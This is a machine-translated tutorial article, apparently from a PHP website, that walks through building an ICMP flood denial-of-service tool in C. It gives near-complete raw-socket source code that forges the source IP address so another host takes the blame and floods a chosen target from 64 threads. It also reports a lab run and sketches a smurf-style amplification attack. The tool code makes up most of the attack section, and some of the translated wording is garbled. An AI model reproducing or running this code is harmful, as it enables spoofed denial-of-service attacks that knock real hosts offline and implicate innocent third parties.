Home > Article > Operation and Maintenance > Linux--Instance introduction of ICMP flood attack
This article mainly introduces the relevant information of ICMP flood attack in LinuxProgramming to everyone. It has certain reference value. Interested friends can refer to it
me In the previous article "Implementation of PING in Linux Programming", the ICMP protocol was used to implement the PING program. In addition to implementing such a PING program, what other unknown or interesting uses does ICMP have? Here I will introduce another well-known black technology of ICMP: ICMP flood attack.
ICMP flood attack is a type of the famous DOS (Denial of Service) attack, which is a favorite attack method of hackers. In order to deepen my understanding of ICMP, I also try I am writing an ICMP flood attack applet based on ICMP.
FLOOD ATTACK refers to a network that uses computer network technology to send a large number of useless data packets to the destination host, making the destination host busy processing useless data packets and unable to provide normal servicesBehavior.
ICMP flood attack: As the name suggests, it is to send a flood of ping packets to the destination host, making the destination host busy processing ping packets and unable to process other normal requests. This is like a flood of ping packets. The destination host was flooded.
To implement ICMP flood attack, the following three knowledge reserves are required:
DOS attack principle
In-depth understanding of ICMP
Raw socket programming skills
##1. ICMP flood attack principle
2. ICMP Flood Attack Program Design
model of the attackPicture:
1. Group ICMP packet
The packet group here is not much different from the packet group when writing the PING program. The only thing that needs to be noted is that we need to fill in the IP header part because we want to disguise the source address and put the blame on others.
void DoS_icmp_pack(char* packet) { struct ip* ip_hdr = (struct ip*)packet; struct icmp* icmp_hdr = (struct icmp*)(packet + sizeof(struct ip)); ip_hdr->ip_v = 4; ip_hdr->ip_hl = 5; ip_hdr->ip_tos = 0; ip_hdr->ip_len = htons(ICMP_PACKET_SIZE); ip_hdr->ip_id = htons(getpid()); ip_hdr->ip_off = 0; ip_hdr->ip_ttl = 64; ip_hdr->ip_p = PROTO_ICMP; ip_hdr->ip_sum = 0; ip_hdr->ip_src.s_addr = inet_addr(FAKE_IP);; //伪装源地址 ip_hdr->ip_dst.s_addr = dest; //填入要攻击的目的主机地址 icmp_hdr->icmp_type = ICMP_ECHO; icmp_hdr->icmp_code = 0; icmp_hdr->icmp_cksum = htons(~(ICMP_ECHO << 8)); //注意这里,因为数据部分为0,我们就简化了一下checksum的计算了 }
2. Build a contract sending thread
void Dos_Attack() { char* packet = (char*)malloc(ICMP_PACKET_SIZE); memset(packet, 0, ICMP_PACKET_SIZE); struct sockaddr_in to; DoS_icmp_pack(packet); to.sin_family = AF_INET; to.sin_addr.s_addr = dest; to.sin_port = htons(0); while(alive) //控制发包的全局变量 { sendto(rawsock, packet, ICMP_PACKET_SIZE, 0, (struct sockaddr*)&to, sizeof(struct sockaddr)); } free(packet); //记得要释放内存 }
3. Write the packet sending switch
The switch here is very simple and can be realized by using semaphore + global variable. When we press ctrl+c, the attack will be turned off.
void Dos_Sig() { alive = 0; printf("stop DoS Attack!\n"); }
4. Overall Architecture
We used 64 threads to send packets together. Of course, the number of threads can be greatly increased to increase the intensity of the attack. But we are just doing experiments, there is no need to make it so big.
int main(int argc, char* argv[]) { struct hostent* host = NULL; struct protoent* protocol = NULL; int i; alive = 1; pthread_t attack_thread[THREAD_MAX_NUM]; //开64个线程同时发包 int err = 0; if(argc < 2) { printf("Invalid input!\n"); return -1; } signal(SIGINT, Dos_Sig); protocol = getprotobyname(PROTO_NAME); if(protocol == NULL) { printf("Fail to getprotobyname!\n"); return -1; } PROTO_ICMP = protocol->p_proto; dest = inet_addr(argv[1]); if(dest == INADDR_NONE) { host = gethostbyname(argv[1]); if(host == NULL) { printf("Invalid IP or Domain name!\n"); return -1; } memcpy((char*)&dest, host->h_addr, host->h_length); } rawsock = socket(AF_INET, SOCK_RAW, PROTO_ICMP); if(rawsock < 0) { printf("Fait to create socket!\n"); return -1; } setsockopt(rawsock, SOL_IP, IP_HDRINCL, "1", sizeof("1")); printf("ICMP FLOOD ATTACK START\n"); for(i=0;i<THREAD_MAX_NUM;i++) { err = pthread_create(&(attack_thread[i]), NULL, (void*)Dos_Attack, NULL); if(err) { printf("Fail to create thread, err %d, thread id : %d\n",err, attack_thread[i]); } } for(i=0;i<THREAD_MAX_NUM;i++) { pthread_join(attack_thread[i], NULL); //等待线程结束 } printf("ICMP ATTACK FINISHI!\n"); close(rawsock); return 0; }
3. Experiment
This experiment is for the purpose of learning. I want to use my own hands to I want to further understand the application of the network and protocols, so the scope of the attack is relatively small, it only lasts a few seconds, and it does not affect any equipment.
Let’s talk about our attack steps again: We use host 172.0.5.183 as our attack host, disguise ourselves as host 172.0.5.182, and launch an ICMP flood attack on host 172.0.5.9.
The attack begins
Let’s observe the situation on the “victim” side. In just 5 seconds, more than 70,000 packets were correctly received and delivered to the upper layer for processing. I don't dare to do too much to avoid affecting the work of the machine.
Use wireshark to capture the packets and take another look. They are full of ICMP packets, which seems to be quite large. The source address of the ICMP packet is shown as 172.0.5.182 (our spoofed address), and it also sends an echo reply back to 172.0.5.182. The host 172.0.5.182 will definitely think that it is inexplicable why it received so many echo reply packets.
The attack experiment is completed.
What is more popular now is the DDOS attack, which is more powerful, has more sophisticated strategies, and is more difficult to defend.
In fact, this kind of DDoS attack is also launched on the basis of DOS. The specific steps are as follows:
1. The attacker broadcasts an echo request message to the "amplification network"
2. The attacker specifies the source IP of the broadcast message as the attacked host
3. "Zoom the network" and echo reply to the attacked host
4. Form a DDoS attack scenario
Here's " "Amplified network" can be understood as a network with many hosts whose operating systems need to support responding to certain ICMP request packets whose destination address is a broadcast address.
The attack strategy is very sophisticated. In short, it is to disguise the source address as the IP address of the attacking host, and then broadcast it to all hosts. After receiving the echo request, the hosts collectively send messages to the attacking host. Return the package, causing a group attack.
The above is the detailed content of Linux--Instance introduction of ICMP flood attack. For more information, please follow other related articles on the PHP Chinese website!